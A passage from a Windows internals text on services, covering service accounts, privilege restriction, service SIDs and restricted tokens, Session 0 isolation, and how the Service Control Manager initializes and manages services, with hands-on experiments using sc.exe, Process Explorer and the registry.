that it belongs to the same groups with the exception that it belongs to the local service group instead
of the network service group. The profile used by processes running in the local service loads into
HKU\S-1-5-19 and is stored in %SystemRoot%\ServiceProfiles\LocalService.
Examples of services that run in the local service account include the Remote Registry Service, which
allows remote access to the local system’s registry, and the LmHosts service, which performs NetBIOS
name resolution.
Running services in alternate accounts
Because of the restrictions just outlined, some services need to run with the security credentials of a
user account. You can configure a service to run in an alternate account when the service is created or
by specifying an account and password that the service should run under with the Windows Services
MMC snap-in. In the Services snap-in, right-click a service and select Properties, click the Log On tab,
and select the This Account option, as shown in Figure 10-10.
Note that when required to start, a service running with an alternate account is always launched us-
ing the alternate account credentials, even though the account is not currently logged on. This means
that the user profile is loaded even though the user is not logged on. User Services, which are described
later in this chapter (in the “User services” section), have also been designed to overcome this problem.
They are loaded only when the user logs on.
FIGURE 10-10 Service account settings.
Running with least privilege
A service’s process typically is subject to an all-or-nothing model, meaning that all privileges available to the account the service process is running under are available to a service running in that process, even if the service requires only a subset of those privileges. To better conform to the principle of least privilege, in
which Windows assigns services only the privileges they require, developers can specify the privileges
their service requires, and the SCM creates a security token that contains only those privileges.
Service developers use the ChangeServiceConfig2 API (specifying the SERVICE_CONFIG_REQUIRED_PRIVILEGES_INFO information level) to indicate the list of privileges they desire. The API saves that information in the registry, into the RequiredPrivileges value of the root service key (refer to Table 10-7).
When the service starts, the SCM reads the key and adds those privileges to the token of the process in
which the service is running.
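The privilege list is delivered as a double-null-terminated multi-string, the same shape as the REG_MULTI_SZ RequiredPrivileges registry value. A minimal sketch of building that format (the helper name and the example privileges are ours, not part of the Windows API):

```python
def build_privilege_multistring(privileges):
    """Build a double-null-terminated multi-string of privilege names,
    the format used by the REG_MULTI_SZ RequiredPrivileges value and by
    the privilege list passed to ChangeServiceConfig2 with the
    SERVICE_CONFIG_REQUIRED_PRIVILEGES_INFO information level."""
    return "".join(p + "\0" for p in privileges) + "\0"

# Hypothetical example: a service that wants to keep a minimal set.
required = build_privilege_multistring(
    ["SeChangeNotifyPrivilege", "SeImpersonatePrivilege"]
)
```

On Windows, this string would be handed to ChangeServiceConfig2 by the service installer; the sketch only illustrates the on-disk/in-memory layout.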
If there is a RequiredPrivileges value and the service is a stand-alone service (running as a dedicated
process), the SCM creates a token containing only the privileges that the service needs. For services
running as part of a shared service process (as are a subset of services that are part of Windows) and
specifying required privileges, the SCM computes the union of those privileges and combines them
for the service-hosting process’s token. In other words, only the privileges not specified by any of the
services that are hosted in the same service process will be removed. In the case in which the registry
value does not exist, the SCM has no choice but to assume that the service is either incompatible with
least privileges or requires all privileges to function. In this case, the full token is created, containing all
privileges, and no additional security is offered by this model. To strip almost all privileges, services can
specify only the Change Notify privilege.
Note The privileges a service specifies must be a subset of those that are available to the
service account in which it runs.
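The shared-process rule described above (the host token receives the union of the privileges required by its services) can be modeled with a short sketch. The service names and privilege lists below are hypothetical, and this is a conceptual illustration rather than SCM code:

```python
def compute_host_privileges(required_by_service):
    """Union of the RequiredPrivileges lists of all services hosted in
    one shared service process (conceptual model of the SCM behavior)."""
    token = set()
    for privileges in required_by_service.values():
        token |= set(privileges)
    return token

# Hypothetical service group sharing one hosting process.
group = {
    "ServiceA": {"SeChangeNotifyPrivilege", "SeImpersonatePrivilege"},
    "ServiceB": {"SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege"},
}
host_token = compute_host_privileges(group)
# A privilege requested by any one hosted service ends up available to all
# services in the process; only privileges no service asked for are absent.
```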
EXPERIMENT: Viewing privileges required by services
You can view the privileges a service requires with the Service Control utility, sc.exe, and the
qprivs option. Additionally, Process Explorer can show you information about the security token
of any service process on the system, so you can compare the information returned by sc.exe
with the privileges part of the token. The following steps show you how to do this for some of the
best locked-down services on the system.
1. Use sc.exe to look at the required privileges specified by CryptSvc by typing the following into a command prompt:
sc qprivs cryptsvc
You should see three privileges being requested: the SeChangeNotifyPrivilege,
SeCreateGlobalPrivilege, and the SeImpersonatePrivilege.
2. Run Process Explorer as administrator and look at the process list. You should see multiple Svchost.exe processes that are hosting the services on your machine (if Svchost splitting is enabled, the number of Svchost instances is even higher). Process Explorer highlights these in pink.
3. CryptSvc is a service that runs in a shared hosting process. In Windows 10, locating the correct process instance is easily achievable through Task Manager. You do not need to know the name of the Service DLL, which is listed in the HKLM\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters registry key.
4. Open Task Manager and look at the Services tab. You should easily find the PID of the CryptSvc hosting process.
5. Return to Process Explorer and double-click the Svchost.exe process that has the same PID found by Task Manager to open the Properties dialog box.
6. Double-check that the Services tab includes the CryptSvc service. If service splitting is enabled, it should contain only one service; otherwise, it will contain multiple services. Then click the Security tab. You should see security information similar to the following figure:
Note that although the service is running as part of the local service account, the list of privi-
leges Windows assigned to it is much shorter than the list available to the local service account
shown in Table 10-10.
For a service-hosting process, the privileges part of the token is the union of the privileges
requested by all the services running inside it, so this must mean that services such as DnsCache
and LanmanWorkstation have not requested privileges other than the ones shown by Process
Explorer. You can verify this by running the Sc.exe tool on those other services as well (only if
Svchost Service Splitting is disabled).
Service isolation
Although restricting the privileges that a service has access to helps lessen the ability of a compromised
service process to compromise other processes, it does nothing to isolate the service from resources
that the account in which it is running has access under normal conditions. As mentioned earlier, the
local system account has complete access to critical system files, registry keys, and other securable
objects on the system because the access control lists (ACLs) grant permissions to that account.
At times, access to some of these resources is critical to a service’s operation, whereas other objects
should be secured from the service. Previously, to avoid running in the local system account to obtain
access to required resources, a service would be run under a standard user account, and ACLs would be
added on the system objects, which greatly increased the risk of malicious code attacking the system.
Another solution was to create dedicated service accounts and set specific ACLs for each account (as-
sociated to a service), but this approach easily became an administrative hassle.
Windows now combines these two approaches into a much more manageable solution: it allows
services to run in a nonprivileged account but still have access to specific privileged resources without
lowering the security of those objects. Indeed, the ACLs on an object can now set permissions directly for
a service, but not by requiring a dedicated account. Instead, Windows generates a service SID to repre-
sent a service, and this SID can be used to set permissions on resources such as registry keys and files.
The Service Control Manager uses service SIDs in different ways. If the service is configured to be
launched using a virtual service account (in the NT SERVICE\ domain), a service SID is generated and
assigned as the main user of the new service’s token. The token will also be part of the NT SERVICE\ALL
SERVICES group. This group is used by the system to allow a securable object to be accessed by any
service. In the case of shared services, the SCM creates the service-hosting processes (a process that
contains more than one service) with a token that contains the service SIDs of all services that are part
of the service group associated with the process, including services that are not yet started (there is no
way to add new SIDs after a token has been created). Restricted and unrestricted services (explained
later in this section) always have a service SID in the hosting process’s token.
EXPERIMENT: Understanding Service SIDs
In Chapter 9, we presented an experiment (“Understanding the security of the VM worker pro-
cess and the virtual hard disk files”) in which we showed how the system generates VM SIDs for
different VM worker processes. Similar to the VM worker process, the system generates Service
SIDs using a well-defined algorithm. This experiment uses Process Explorer to show service SIDs
and explains how the system generates them.
First, you need to choose a service that runs with a virtual service account or under a re-
stricted/nonrestricted access token. Open the Registry Editor (by typing regedit in the Cortana
search box) and navigate to the HKLM\SYSTEM\CurrentControlSet\Services registry key. Then
select Find from the Edit menu. As discussed previously in this section, the service account is
stored in the ObjectName registry value. Unfortunately, you would not find a lot of services run-
ning in a virtual service account (those accounts begin with the NT SERVICE\ virtual domain), so it
is better if you look at a restricted token (unrestricted tokens work, too). Type ServiceSidType (the value of which stores whether the service should run with a restricted or unrestricted token) and click the Find Next button.
For this experiment, you are looking for a restricted service account (which has the
ServiceSidType value set to 3), but unrestricted services work well, too (the value is set to 1).
If the desired value does not match, you can use the F3 button to find the next service. In this
experiment, use the BFE service.
Open Process Explorer, search for the BFE hosting process (refer to the previous experiment to understand how to find the correct one), and double-click it. Select the Security tab and click
the NT SERVICE\BFE Group (the human-readable notation of the service SID) or the service SID of
your service if you have chosen another one. Note the extended group SID, which appears under
the group list (if the service is running under a virtual service account, the service SID is instead
shown by Process Explorer in the second line of the Security Tab):
S-1-5-80-1383147646-27650227-2710666058-1662982300-1023958487
The NT authority (ID 5) is responsible for the service SIDs, generated by using the service base
RID (80) and by the SHA-1 hash of the uppercased UTF-16 Unicode string of the service name.
SHA-1 is an algorithm that produces a 160-bit (20-byte) value. In the Windows security world, this means that the SID will have five 4-byte sub-authority values. The SHA-1 hash of the Unicode (UTF-16) BFE service name is:
7e 28 71 52 b3 e8 a5 01 4a 7b 91 a1 9c 18 1f 63 d7 5d 08 3d
If you divide the produced hash into five groups of eight hexadecimal digits, you will find the following:
- 0x5271287E (first DWORD value), which equals 1383147646 in decimal (remember that Windows is a little-endian OS)
- 0x01A5E8B3 (second DWORD value), which equals 27650227 in decimal
- 0xA1917B4A (third DWORD value), which equals 2710666058 in decimal
- 0x631F189C (fourth DWORD value), which equals 1662982300 in decimal
- 0x3D085DD7 (fifth DWORD value), which equals 1023958487 in decimal
If you combine the numbers and add the service SID authority value and first RID (S-1-5-80),
you build the same SID shown by Process Explorer. This demonstrates how the system generates
service SIDs.
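The steps above can be reproduced in a few lines of code. This is a sketch of the algorithm exactly as the experiment describes it (SHA-1 of the uppercased UTF-16LE service name, split into five little-endian DWORDs appended to S-1-5-80); the function name is ours:

```python
import hashlib
import struct

def service_sid(service_name: str) -> str:
    # SHA-1 of the uppercased service name, encoded as UTF-16LE.
    digest = hashlib.sha1(service_name.upper().encode("utf-16-le")).digest()
    # The 20-byte hash becomes five little-endian 32-bit sub-authorities.
    subauthorities = struct.unpack("<5I", digest)
    # The NT authority (5) and the service base RID (80) come first.
    return "S-1-5-80-" + "-".join(str(v) for v in subauthorities)

print(service_sid("BFE"))
# S-1-5-80-1383147646-27650227-2710666058-1662982300-1023958487
```

The output matches the SID shown by Process Explorer for the BFE service in the experiment.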
The usefulness of having a SID for each service extends beyond the mere ability to add ACL entries and
permissions for various objects on the system as a way to have fine-grained control over their access. Our
discussion initially covered the case in which certain objects on the system, accessible by a given account,
must be protected from a service running within that same account. As we’ve previously described,
service SIDs prevent that problem only by requiring that Deny entries associated with the service SID
be placed on every object that needs to be secured, which is clearly an unmanageable approach.
To avoid requiring Deny access control entries (ACEs) as a way to prevent services from having access to resources that the user account in which they run does have access to, there are two types of service SIDs: the restricted service SID (SERVICE_SID_TYPE_RESTRICTED) and the unrestricted service SID
(SERVICE_SID_TYPE_UNRESTRICTED), the latter being the default and the case we’ve looked at up to
now. The names are a little misleading in this case. The service SID is always generated in the same way
(see the previous experiment). It is the token of the hosting process that is generated in a different way.
Unrestricted service SIDs are created as enabled-by-default, group owner SIDs, and the process
token is also given a new ACE that provides full permission to the service logon SID, which allows the
service to continue communicating with the SCM. (A primary use of this would be to enable or disable
service SIDs inside the process during service startup or shutdown.) A service running with the SYSTEM
account launched with an unrestricted token is even more powerful than a standard SYSTEM service.
A restricted service SID, on the other hand, turns the service-hosting process’s token into a write-
restricted token. Restricted tokens (see Chapter 7 of Part 1 for more information on tokens) generally
require the system to perform two access checks while accessing securable objects: one using the stan-
dard token’s enabled group SIDs list, and another using the list of restricted SIDs. For a standard restricted
token, access is granted only if both access checks allow the requested access rights. On the other hand,
write-restricted tokens (which are usually created by specifying the WRITE_RESTRICTED flag to the
CreateRestrictedToken API) perform the double access checks only for write requests: read-only access
requests raise just one access check on the token’s enabled group SIDs as for regular tokens.
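The check logic just described can be illustrated with a small conceptual model. This is an illustration of the rule, not the actual kernel access-check code, and the SIDs used are placeholders:

```python
def write_restricted_check(enabled_groups, restricted_sids,
                           acl_grants, want_write):
    """Model the access check for a write-restricted token: reads use
    only the enabled group SIDs, while writes must also pass a second
    check against the restricted SID list."""
    normal = bool(enabled_groups & acl_grants)
    if not want_write:
        return normal  # read-only access: single check, as for regular tokens
    return normal and bool(restricted_sids & acl_grants)

enabled = {"LOCAL SERVICE", "Everyone"}   # enabled group SIDs (placeholders)
restricted = {"NT SERVICE\\SomeSvc"}      # restricted service SID (hypothetical)

# An object granting access only to LOCAL SERVICE is readable but not
# writable; an object that also grants the service SID is writable.
```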
The service host process running with a write-restricted token can write only to objects granting
explicit write access to the service SID (and the following three supplemental SIDs added for compatibility), regardless of the account it’s running under. Because of this, all services running inside that process (part of the same service group) must have the restricted SID type; otherwise, services with the
restricted SID type fail to start. Once the token becomes write-restricted, three more SIDs are added
for compatibility reasons:
- The world SID is added to allow write access to objects that are normally accessible by anyone anyway, most importantly certain DLLs in the load path.
- The service logon SID is added to allow the service to communicate with the SCM.
- The write-restricted SID is added to allow objects to explicitly allow any write-restricted service write access to them. For example, ETW uses this SID on its objects to allow any write-restricted service to generate events.
Figure 10-11 shows an example of a service-hosting process containing services that have been
marked as having restricted service SIDs. For example, the Base Filtering Engine (BFE), which is respon-
sible for applying Windows Firewall filtering rules, is part of this hosting process because these rules are
stored in registry keys that must be protected from malicious write access should a service be compro-
mised. (This could allow a service exploit to disable the outgoing traffic firewall rules, enabling bidirec-
tional communication with an attacker, for example.)
FIGURE 10-11 Service with restricted SIDs.
By blocking write access to objects that would otherwise be writable by the service (through inherit-
ing the permissions of the account it is running as), restricted service SIDs solve the other side of the
problem we initially presented because users do not need to do anything to prevent a service running
in a privileged account from having write access to critical system files, registry keys, or other objects,
limiting the attack exposure of any such service that might have been compromised.
Windows also allows for firewall rules that reference service SIDs linked to one of the three behav-
iors described in Table 10-11.
TABLE 10-11 Network restriction rules

Scenario: Network access blocked
Example: The shell hardware detection service (ShellHWDetection).
Restrictions: All network communications are blocked (both incoming and outgoing).

Scenario: Network access statically port-restricted
Example: The RPC service (Rpcss) operates on port 135 (TCP and UDP).
Restrictions: Network communications are restricted to specific TCP or UDP ports.

Scenario: Network access dynamically port-restricted
Example: The DNS service (Dns) listens on variable ports (UDP).
Restrictions: Network communications are restricted to configurable TCP or UDP ports.
The virtual service account
As introduced in the previous section, a service SID also can be set as the owner of the token of a
service running in the context of a virtual service account. A service running with a virtual service ac-
count has fewer privileges than the LocalService or NetworkService service types (refer to Table 10-10
for the list of privileges) and no credentials available to authenticate it through the network. The
Service SID is the token’s owner, and the token is part of the Everyone, Users, Authenticated Users, and
All Services groups. This means that the service can read (or write, unless the service uses a restricted
SID type) objects that belong to standard users but not to high-privileged ones belonging to the
Administrator or System group. Unlike the other types, a service running with a virtual service ac-
count has a private profile, which is loaded by the ProfSvc service (Profsvc.dll) during service logon, in
a similar way as for regular services (more details in the “Service logon” section). The profile is initially
created during the first service logon using a folder with the same name as the service located in the
%SystemRoot%\ServiceProfiles path. When the service’s profile is loaded, its registry hive is mounted
in the HKEY_USERS root key, under a key named after the virtual service account’s human-readable SID (starting with S-1-5-80, as explained in the “Understanding Service SIDs” experiment).
Users can easily assign a virtual service account to a service by setting the log-on account to NT
SERVICE\<ServiceName>, where <ServiceName> is the name of the service. At logon time, the Service
Control Manager recognizes that the log-on account is a virtual service account (thanks to the NT
SERVICE logon provider) and verifies that the account’s name corresponds to the name of the ser-
vice. A service can’t be started using a virtual service account that belongs to another one, and this
is enforced by SCM (through the internal ScIsValidAccountName function). Services that share a host
process cannot run with a virtual service account.
While operating on securable objects, users can add to the object’s ACL, using the service log-on account name (in the form of NT SERVICE\<ServiceName>), an ACE that allows or denies access to a virtual
service. As shown in Figure 10-12, the system is able to translate the virtual service account’s name to
the proper SID, thus establishing fine-grained access control to the object from the service. (This also
works for regular services running with a nonsystem account, as explained in the previous section.)
FIGURE 10-12 A file (securable object) with an ACE allowing full access to the TestService.
Interactive services and Session 0 Isolation
One restriction that has always been present in Windows for services running under a proper service account (the local system, local service, and network service accounts) is that these services could not display dialog boxes or windows on the interactive user’s desktop. This limitation wasn’t the direct result of running under these accounts but rather a consequence of the way the Windows subsystem assigns service
processes to window stations. This restriction is further enhanced by the use of sessions, in a model called
Session 0 Isolation, a result of which is that services cannot directly interact with a user’s desktop.
The Windows subsystem associates every Windows process with a window station. A window station
contains desktops, and desktops contain windows. Only one window station can be visible at a time
and receive user mouse and keyboard input. In a Terminal Services environment, one window station
per session is visible, but services all run as part of the hidden session 0. Windows names the visible
window station WinSta0, and all interactive processes access WinSta0.
Unless otherwise directed, the Windows subsystem associates services running within the proper
service account or the local system account with a nonvisible window station named Service-0x0-
3e7$ that all noninteractive services share. The number in the name, 3e7, represents the logon session
identifier that the Local Security Authority process (LSASS) assigns to the logon session the SCM uses
for noninteractive services running in the local system account. In a similar way, services running in the
Local service account are associated with the window station generated by the logon session 3e5, while
services running in the network service account are associated with the window station generated by
the logon session 3e4.
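The window station names quoted above simply embed the logon session LUID in hexadecimal. A small sketch of that naming scheme, derived only from the names given in the text (the helper function is ours):

```python
# Well-known service logon session IDs, as described above, and the
# accounts they correspond to.
SERVICE_LOGON_SESSIONS = {
    0x3e7: "Local System",      # 999 decimal
    0x3e5: "Local Service",     # 997 decimal
    0x3e4: "Network Service",   # 996 decimal
}

def window_station_name(logon_session_id: int) -> str:
    """Form the Service-0x0-<luid>$ window station name for a logon session."""
    return f"Service-0x0-{logon_session_id:x}$"

for luid, account in SERVICE_LOGON_SESSIONS.items():
    print(account, "->", window_station_name(luid))
```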
Services configured to run under a user account (that is, not the local system account) are run in a
different nonvisible window station named with the LSASS logon identifier assigned for the service’s
logon session. Figure 10-13 shows a sample display from the Sysinternals WinObj tool that shows the
object manager directory in which Windows places window station objects. Visible are the interactive
window station (WinSta0) and the three noninteractive services window stations.
FIGURE 10-13 List of window stations.
Regardless of whether services are running in a user account, the local system account, or the local
or network service accounts, services that aren’t running on the visible window station can’t receive
input from a user or display visible windows. In fact, if a service were to pop up a modal dialog box,
the service would appear hung because no user would be able to see the dialog box, which of course
would prevent the user from providing keyboard or mouse input to dismiss it and allow the service to
continue executing.
A service could have a valid reason to interact with the user via dialog boxes or windows. Services
configured using the SERVICE_INTERACTIVE_PROCESS flag in the service’s registry key’s Type parameter
are launched with a hosting process connected to the interactive WinSta0 window station. (Note that
services configured to run under a user account can’t be marked as interactive.) Were user processes to
run in the same session as services, this connection to WinSta0 would allow the service to display dialog
boxes and windows and enable those windows to respond to user input because they would share the
window station with the interactive services. However, only processes owned by the system and Windows
services run in session 0; all other logon sessions, including those of console users, run in different ses-
sions. Therefore, any window displayed by processes in session 0 is not visible to the user.
This additional boundary helps prevent shatter attacks, whereby a less-privileged application sends
window messages to a window visible on the same window station to exploit a bug in a more privi-
leged process that owns the window, which permits it to execute code in the more privileged process.
In the past, Windows included the Interactive Services Detection service (UI0Detect), which notified
users when a service had displayed a window on the main desktop of the WinSta0 window station of
Session 0. This would allow the user to switch to the session 0’s window station, making interactive
services run properly. For security purposes, this feature was first disabled; since Windows 10 April 2018
Update (RS4), it has been completely removed.
As a result, even though interactive services are still supported by the Service Control Manager (only
by setting the HKLM\SYSTEM\CurrentControlSet\Control\Windows\NoInteractiveServices registry
value to 0), access to session 0 is no longer possible. No service can display any window anymore (at
least without some undocumented hack).
The Service Control Manager (SCM)
The SCM’s executable file is %SystemRoot%\System32\Services.exe, and like most service processes, it
runs as a Windows console program. The Wininit process starts the SCM early during the system boot.
(Refer to Chapter 12 for details on the boot process.) The SCM’s startup function, SvcCtrlMain, orches-
trates the launching of services that are configured for automatic startup.
SvcCtrlMain first performs its own initialization by setting its process secure mitigations and
unhandled exception filter and by creating an in-memory representation of the well-known SIDs. It
then creates two synchronization events: one named SvcctrlStartEvent_A3752DX and the other named
SC_AutoStartComplete. Both are initialized as nonsignaled. The first event is signaled by the SCM after
all the steps necessary to receive commands from SCPs are completed. The second is signaled when the
entire initialization of the SCM is completed. The event is used for preventing the system or other users
from starting another instance of the Service Control Manager. The function that an SCP uses to estab-
lish a dialog with the SCM is OpenSCManager. OpenSCManager prevents an SCP from trying to contact
the SCM before the SCM has initialized by waiting for SvcctrlStartEvent_A3752DX to become signaled.
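This wait-before-connect pattern can be sketched with a small Python analogy (using `threading.Event` rather than the Windows API; the function and handle names below are invented for illustration only):

```python
# Illustrative sketch, NOT the Windows implementation: an SCP-style client
# blocks on a "start" event so it cannot talk to the manager before
# initialization completes, mirroring the SvcctrlStartEvent_A3752DX wait.
import threading

start_event = threading.Event()   # stands in for SvcctrlStartEvent_A3752DX

def open_sc_manager(timeout=5.0):
    """Hypothetical OpenSCManager analog: wait for the start event first."""
    if not start_event.wait(timeout):
        raise TimeoutError("SCM not initialized")
    return "scm-handle"           # placeholder for a real SCM handle

start_event.set()                 # "SCM" signals once it can receive commands
print(open_sc_manager())          # -> scm-handle
```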
Next, SvcCtrlMain gets down to business, creates a proper security descriptor, and calls
ScGenerateServiceDB, the function that builds the SCM’s internal service database. ScGenerateServiceDB
reads and stores the contents of HKLM\SYSTEM\CurrentControlSet\Control\ServiceGroupOrder\List,
a REG_MULTI_SZ value that lists the names and order of the defined service groups. A service’s registry
key contains an optional Group value if that service or device driver needs to control its startup order-
ing with respect to services from other groups. For example, the Windows networking stack is built
from the bottom up, so networking services must specify Group values that place them later in the
startup sequence than networking device drivers. The SCM internally creates a group list that preserves
the ordering of the groups it reads from the registry. Groups include (but are not limited to) NDIS, TDI,
Primary Disk, Keyboard Port, Keyboard Class, Filters, and so on. Add-on and third-party applications
can even define their own groups and add them to the list. Microsoft Transaction Server, for example,
adds a group named MS Transactions.
ScGenerateServiceDB then scans the contents of HKLM\SYSTEM\CurrentControlSet\Services, creat-
ing an entry (called “service record”) in the service database for each key it encounters. A database
entry includes all the service-related parameters defined for a service as well as fields that track the
service’s status. The SCM adds entries for device drivers as well as for services because the SCM starts
services and drivers marked as autostart and detects startup failures for drivers marked boot-start and
system-start. It also provides a means for applications to query the status of drivers. The I/O manager
loads drivers marked boot-start and system-start before any user-mode processes execute, and there-
fore any drivers having these start types load before the SCM starts.
ScGenerateServiceDB reads a service’s Group value to determine its membership in a group and
associates this value with the group’s entry in the group list created earlier. The function also reads and
records in the database the service’s group and service dependencies by querying its DependOnGroup
and DependOnService registry values. Figure 10-14 shows how the SCM organizes the service entry
and group order lists. Notice that the service list is sorted alphabetically. The reason this list is sorted
alphabetically is that the SCM creates the list from the Services registry key, and Windows enumerates
registry keys alphabetically.
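As a rough Python sketch (not the actual SCM data structures; all names are invented), the alphabetical ordering falls out of enumerating the Services key, with no explicit sort step needed:

```python
# Simplified sketch of ScGenerateServiceDB's result: a group list that
# preserves ServiceGroupOrder\List order, and a service entry list that is
# alphabetical because registry subkeys enumerate alphabetically.
def generate_service_db(services_key: dict, group_order: list):
    """services_key maps service name -> its registry values (a dict)."""
    group_list = list(group_order)       # keep the registry-defined order
    service_entries = []
    for name in sorted(services_key):    # registry enumerates keys alphabetically
        values = services_key[name]
        service_entries.append({
            "Name": name,
            "Group": values.get("Group"),
            "DependOnGroup": values.get("DependOnGroup", []),
            "DependOnService": values.get("DependOnService", []),
        })
    return group_list, service_entries

groups, entries = generate_service_db(
    {"Zsvc": {"Group": "NDIS"}, "Asvc": {}, "Msvc": {"Group": "TDI"}},
    ["NDIS", "TDI", "Primary Disk"],
)
print([e["Name"] for e in entries])      # -> ['Asvc', 'Msvc', 'Zsvc']
```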
[Figure 10-14 diagram: a group order list (Group1, Group2, Group3) alongside an alphabetically sorted service entry list (Service1, Service2, Service3), where each service record contains Type, Start, DependOnGroup, DependOnService, Status, and Group fields.]
FIGURE 10-14 Organization of the service database.
During service startup, the SCM calls on LSASS (for example, to log on a service in a nonlocal system
account), so the SCM waits for LSASS to signal the LSA_RPC_SERVER_ACTIVE synchronization event,
which it does when it finishes initializing. Wininit also starts the LSASS process, so the initialization of
LSASS is concurrent with that of the SCM, and the order in which LSASS and the SCM complete initial-
ization can vary. The SCM cleans up (from the registry, other than from the database) all the services
that were marked as deleted (through the DeleteFlag registry value) and generates the dependency list
for each service record in the database. This allows the SCM to know which service is dependent on a
particular service record, which is the opposite dependency information compared to the one stored
in the registry.
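The inversion can be illustrated with a few lines of Python (a hypothetical sketch, not SCM code): the registry stores "service X depends on Y," and the SCM builds the reverse map, "Y is depended on by X."

```python
# Hypothetical sketch: inverting the registry's DependOnService information
# so the SCM can answer "which services depend on X?" directly.
def build_reverse_dependencies(depends_on: dict) -> dict:
    reverse = {}
    for service, deps in depends_on.items():
        for dep in deps:
            reverse.setdefault(dep, []).append(service)
    return reverse

rev = build_reverse_dependencies({
    "Dnscache": ["Tcpip"],
    "LanmanWorkstation": ["Tcpip", "MrxSmb"],
})
print(rev["Tcpip"])   # -> ['Dnscache', 'LanmanWorkstation']
```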
The SCM then queries whether the system is started in safe mode (from the HKLM\System\
CurrentControlSet\Control\SafeBoot\Option\OptionValue registry value). This check is needed for
determining later if a service should start (details are explained in the “Autostart services startup”
section later in this chapter). It then creates its remote procedure call (RPC) named pipe, which is
named \Pipe\Ntsvcs, and then RPC launches a thread to listen on the pipe for incoming messages
from SCPs. The SCM signals its initialization-complete event, SvcctrlStartEvent_A3752DX. Registering a
console application shutdown event handler and registering with the Windows subsystem process via
RegisterServiceProcess prepares the SCM for system shutdown.
Before starting the autostart services, the SCM performs a few more steps. It initializes the UMDF
driver manager, which is responsible for managing UMDF drivers. Since Windows 10 Fall Creators
Update (RS3), it’s part of the Service Control Manager and waits for the known DLLs to be fully initial-
ized (by waiting on the \KnownDlls\SmKnownDllsInitialized event that’s signaled by Session Manager).
EXPERIMENT: Enable services logging
The Service Control Manager usually logs ETW events only when it detects abnormal error con-
ditions (for example, while failing to start a service or to change its configuration). This behavior
can be overridden by manually enabling or disabling a different kind of SCM events. In this ex-
periment, you will enable two kinds of events that are particularly useful for debugging a service
change of state. Events 7036 and 7042 are raised when a service changes status or when a STOP
control request is sent to a service.
Those two events are enabled by default on server SKUs but not on client editions of
Windows 10. Using your Windows 10 machine, you should open the Registry Editor (by typing
regedit.exe in the Cortana search box) and navigate to the following registry key: HKLM\
SYSTEM\CurrentControlSet\Control\ScEvents. If the last subkey does not exist, you should create
it by right-clicking the Control subkey and selecting the Key item from the New context menu.
Now you should create two DWORD values and name them 7036 and 7042. Set the data of the
two values to 1. (You can set them to 0 to gain the opposite effect of preventing those events from
being generated, even on Server SKUs.) You should get a registry state like the following one:
Restart your workstation, and then start and stop a service (for example, the AppXSvc service)
using the sc.exe tool by opening an administrative command prompt and typing the following
commands:
sc stop AppXSvc
sc start AppXSvc
Open the Event Viewer (by typing eventvwr in the Cortana search box) and navigate to
Windows Logs and then System. You should note different events from the Service Control
Manager with Event ID 7036 and 7042. In the top ones, you should find the stop event generated
by the AppXSvc service, as shown in the following figure:
Note that the Service Control Manager by default logs all the events generated by services
started automatically at system startup. This can generate an undesired number of events flood-
ing the System event log. To mitigate the problem, you can disable SCM autostart events by
creating a registry value named EnableAutostartEvents in the HKLM\System\CurrentControlSet\
Control key and setting it to 0 (the default implicit value is 1 in both client and server SKUs). As a
result, this will log only events generated by service applications when starting, pausing, or stop-
ping a target service.
Network drive letters
In addition to its role as an interface to services, the SCM has another totally unrelated responsibil-
ity: It notifies GUI applications in a system whenever the system creates or deletes a network drive-
letter connection. The SCM waits for the Multiple Provider Router (MPR) to signal a named event,
\BaseNamedObjects\ScNetDrvMsg, which MPR signals whenever an application assigns a drive letter
to a remote network share or deletes a remote-share drive-letter assignment. When MPR signals the
event, the SCM calls the GetDriveType Windows function to query the list of connected network drive
letters. If the list changes across the event signal, the SCM sends a Windows broadcast message of type
WM_DEVICECHANGE. The SCM uses either DBT_DEVICEREMOVECOMPLETE or DBT_DEVICEARRIVAL
as the message’s subtype. This message is primarily intended for Windows Explorer so that it can up-
date any open computer windows to show the presence or absence of a network drive letter.
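The decision between the two subtypes can be sketched as a simple set comparison (illustrative Python; the `DBT_*` values match the Windows SDK constants, but the function itself is invented):

```python
# Illustrative sketch of the notification logic: compare the connected
# network-drive set before and after the ScNetDrvMsg event and pick the
# WM_DEVICECHANGE subtype accordingly.
DBT_DEVICEARRIVAL = 0x8000          # a drive letter appeared
DBT_DEVICEREMOVECOMPLETE = 0x8004   # a drive letter went away

def drive_change_subtype(before: set, after: set):
    if after - before:
        return DBT_DEVICEARRIVAL
    if before - after:
        return DBT_DEVICEREMOVECOMPLETE
    return None                     # no visible change

print(hex(drive_change_subtype({"X:"}, {"X:", "Z:"})))  # -> 0x8000
```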
Service control programs
As introduced in the “Service applications” section, service control programs (SCPs) are stan-
dard Windows applications that use SCM service management functions, including CreateService,
OpenService, StartService, ControlService, QueryServiceStatus, and DeleteService. To use the SCM func-
tions, an SCP must first open a communications channel to the SCM by calling the OpenSCManager
function to specify what types of actions it wants to perform. For example, if an SCP simply wants
to enumerate and display the services present in the SCM’s database, it requests enumerate-service
access in its call to OpenSCManager. During its initialization, the SCM creates an internal object that
represents the SCM database and uses the Windows security functions to protect the object with a
security descriptor that specifies what accounts can open the object with what access permissions. For
example, the security descriptor indicates that the Authenticated Users group can open the SCM object
with enumerate-service access. However, only administrators can open the object with the access
required to create or delete a service.
As it does for the SCM database, the SCM implements security for services themselves. When an
SCP creates a service by using the CreateService function, it specifies a security descriptor that the
SCM associates internally with the service’s entry in the service database. The SCM stores the security
descriptor in the service’s registry key as the Security value, and it reads that value when it scans the
registry’s Services key during initialization so that the security settings persist across reboots. In the
same way that an SCP must specify what types of access it wants to the SCM database in its call to
OpenSCManager, an SCP must tell the SCM what access it wants to a service in a call to OpenService.
Accesses that an SCP can request include the ability to query a service’s status and to configure, stop,
and start a service.
The SCP you’re probably most familiar with is the Services MMC snap-in that’s included in Windows,
which resides in %SystemRoot%\System32\Filemgmt.dll. Windows also includes Sc.exe (Service
Controller tool), a command-line service control program that we’ve mentioned multiple times.
SCPs sometimes layer service policy on top of what the SCM implements. A good example is the
timeout that the Services MMC snap-in implements when a service is started manually. The snap-in
presents a progress bar that represents the progress of a service’s startup. Services indirectly inter-
act with SCPs by setting their configuration status to reflect their progress as they respond to SCM
commands such as the start command. SCPs query the status with the QueryServiceStatus function.
They can tell when a service actively updates the status versus when a service appears to be hung, and
the SCM can take appropriate actions in notifying a user about what the service is doing.
Autostart services startup
SvcCtrlMain invokes the SCM function ScAutoStartServices to start all services that have a Start value
designating autostart (except delayed autostart and user services). ScAutoStartServices also starts auto-
